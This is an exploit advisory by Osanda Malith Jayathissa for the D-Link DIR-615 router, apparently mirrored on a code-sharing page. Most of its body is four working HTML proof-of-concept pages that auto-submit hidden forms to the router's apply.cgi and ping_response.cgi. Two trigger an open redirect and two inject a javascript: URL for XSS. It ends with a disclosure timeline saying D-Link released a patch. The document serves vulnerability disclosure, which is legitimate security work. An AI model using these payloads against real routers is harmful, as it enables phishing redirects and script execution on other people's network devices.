扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 |
# Title:D-Link DIR-615 Multiple Vulnerabilities # Date: 10-01-2017 # Hardware Version: E3 # Firmware Version: 5.10 # Tested on:Windows 8 64-bit # Exploit Author: Osanda Malith Jayathissa (@OsandaMalith) # Original write-up:https://osandamalith.com/2017/01/04/d-link-dir-615-open-redirection-and-xss/ Overview -------- The 'apply.cgi' file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in 'apply.cgi'. For example the 'ping_response.cgi' file. Open Redirection ----------------- # apply.cgi <html> <!-- @OsandaMalith --> <body> <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit"> <input type="hidden" name="html_response_page" value="https://google.lk" /> <input type="hidden" name="html_response_return_page" value="tools_vct.asp" /> <img src=x onerror="exploit.submit()"/> </form> </body> </html> # ping_response.cgi <html> <!-- @OsandaMalith --> <body> <form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit"> <input type="hidden" name="html_response_page" value="https://google.lk" /> <input type="hidden" name="html_response_return_page" value="tools_vct.asp" /> <input type="hidden" name="ping_ipaddr" value="192.168.0.101" /> <input type="hidden" name="ping" value="Ping" /> <img src=x onerror="exploit.submit()"/> </form> </body> </html> POST XSS --------- # apply.cgi <html> <!-- @OsandaMalith --> <body> <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit"> <input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" /> <input type="hidden" name="html_response_return_page" value="tools_vct.asp" /> <img src=x onerror="exploit.submit()"/> </form> </body> </html> # ping_response.cgi <html> <!-- @OsandaMalith --> <body> <form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit"> <input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" /> <input type="hidden" name="html_response_return_page" value="tools_vct.asp" /> <input type="hidden" name="ping_ipaddr" value="127.0.0.1" /> <input type="hidden" name="ping" value="Ping" /> <img src=x onerror="exploit.submit()"/> </form> </body> </html> Disclosure Timeline -------------------- 12/19/16: Reported to D-Link 12/21/16: Security Patch released ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVT/DIR-615_REVT_RELEASE_NOTES_20.12PTb01.pdf |
体验盒子
